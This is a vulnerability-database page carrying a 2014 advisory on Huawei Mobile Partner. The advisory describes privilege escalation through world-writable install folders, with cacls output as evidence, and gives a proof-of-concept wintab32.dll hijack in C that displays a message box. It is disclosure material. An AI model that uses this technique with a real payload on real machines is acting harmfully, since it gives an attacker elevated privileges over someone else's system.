Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOsanda MalithPACKETSTORM:128767
HistoryOct 21, 2014 - 12:00 a.m.

Huawei Mobile Partner DLL Hijacking

2014-10-2100:00:00
Osanda Malith
packetstormsecurity.com
35

EPSS

0.003

Percentile

71.5%

JSON
`# Title: Huawei Mobile Partner Multiple Vulnerabilities  
# Version: 23.009.05.03.1014  
# Tested on: Windows XP SP2 en  
# Vendor: http://www.huawei.com/  
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide  
# E-Mail: osanda[at]unseen.is  
# Author: Osanda Malith Jayathissa  
# /!\ Author is not responsible for any damage you cause  
# Use this material for educational purposes only  
  
  
#1| Local Privilege Escalation   
--------------------------------  
  
- Description  
==============  
Any user in the system can modify the legitimate binary to any kind of malicious executable.   
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and  
perform DLL hijacking easily. If an attacker break into a low privilege account he could use  
this application to escalate his privileges.  
  
- Proof of Concept  
===================  
  
C:\Program Files>cacls "Mobile Partner"  
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F  
BUILTIN\Users:(CI)F  
NT SERVICE\TrustedInstaller:(ID)F  
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F  
NT AUTHORITY\SYSTEM:(ID)F  
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F  
BUILTIN\Administrators:(ID)F  
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F  
CREATOR OWNER:(OI)(CI)(IO)(ID)F  
  
  
C:\Program Files>cd "Mobile Partner"  
  
C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"  
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F  
BUILTIN\Users:(ID)F  
NT AUTHORITY\SYSTEM:(ID)F  
BUILTIN\Administrators:(ID)F  
  
  
  
  
#2| Dll Hijacking Vulnerability (wintab32.dll)  
-----------------------------------------------  
  
  
#include <windows.h>   
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH: owned();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
int owned() {  
MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);  
}  
/*EOF*/  
`

Related

exploitdb 1
huawei 1
cvelist 2
prion 2
cve 2
nvd 2
exploitdb
exploitdb
Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation
2013-12-24 00:00:00
huawei
huawei
Security Advisory-DLL Hijacking Vulnerability on Huawei USB Modem products
2014-10-22 00:00:00
cvelist
cvelist
CVE-2014-8358
2017-12-11 21:00:00
CVE-2014-8359
2014-11-13 15:00:00
prion
prion
Design/Logic Flaw
2014-11-13 21:32:00
Design/Logic Flaw
2017-12-11 21:29:00
cve
cve
CVE-2014-8358
2017-12-11 21:29:00
CVE-2014-8359
2014-11-13 21:32:05
nvd
nvd
CVE-2014-8359
2014-11-13 21:32:05
CVE-2014-8358
2017-12-11 21:29:00

EPSS

0.003

Percentile

71.5%

JSON
Related for PACKETSTORM:128767
exploitdb1huawei1cvelist2prion2cve2nvd2